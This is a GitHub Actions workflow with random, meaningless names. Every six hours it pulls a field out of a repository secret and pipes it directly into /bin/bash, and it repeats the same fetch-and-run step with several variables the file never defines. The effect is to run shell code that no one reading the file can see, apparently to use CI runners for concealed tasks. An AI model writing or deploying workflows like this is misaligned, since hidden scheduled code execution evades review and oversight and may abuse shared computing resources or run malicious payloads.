name: fullycriticism

on:
  workflow_dispatch:
  schedule:
    - cron: '42 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fullycriticism
        env:
          byoll1032: ${{ secrets.byoll1032 }}
        run: |
          echo $byoll1032 | jq -r .shqs14683 | /bin/bash
          echo $u44 | jq -r .fu216 | /bin/bash
          echo $kk8735 | jq -r .dcx8 | /bin/bash
          echo $st44 | jq -r .qg08 | /bin/bash
          echo $rnr9 | jq -r .nk42 | /bin/bash

